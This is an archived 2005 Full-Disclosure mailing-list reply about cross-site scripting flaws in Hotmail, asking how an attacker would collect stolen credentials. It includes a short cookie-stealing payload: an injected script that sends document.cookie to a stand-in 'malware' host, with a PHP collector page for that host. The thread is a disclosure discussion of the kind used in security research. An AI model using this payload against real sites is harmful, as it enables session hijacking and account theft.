[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Re: [VulnWatch] Hotmail Advisories
- To: "Sherwyn Williams" <sherwill22@xxxxxxxxx>, "Luis A. Cortes Zavala" <luis.cortes@xxxxxxxxxxxxxx>, <full-disclosure@xxxxxxxxxxxxxxxxx>, <vulnwatch@xxxxxxxxxxxxx>, <bugtraq@xxxxxxxxxxxxxxxxx>
- Subject: Re: [Full-disclosure] Re: [VulnWatch] Hotmail Advisories
- From: "Jerome Athias" <jerome.athias@xxxxxxx>
- Date: Wed, 4 May 2005 14:41:15 +0200
Ok I think I get what you are saying, however to use this vuln, would
need to have a script running on a server some where that recieves the
username and password?
Or just based on what you have here this can be possible. If one does not
have knowledge of java script, all the would have to do is use those
various html codes you wrote and send that to them as an attachment, but
how would I get the username and password ????
For example, this is a simple way to steal a cookie:
Inject this code:
<script>window.open('http://www.your-malware-website.com/givemecook.php?cook='%2Bdocument.cookie);</script>
And on "your-malware-website" put this page:
givemecook.php:
<?
echo $HTTP_COOKIE_VARS["cook"];
?>
and so, the cookie will be logged in "your-malware-website"
I was testing this until I can get some working code, the authorization
and
validation of the site is one of the better that I seen on a mailing
system,
I never heard about vulnerabilities of hotmail as in others systems, I
just
have knowledge of two flaws discovered. One on 1999 is from George
Guninski,
and the other when the pwdreset function make its public, every year
hotmail
is updated, and getting more secure, and it's hard to believe that no one
have found this before.
Try to play with this in hotmail
http://seclists.org/lists/bugtraq/2005/Feb/0473.html
Cheers,
Jerome
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/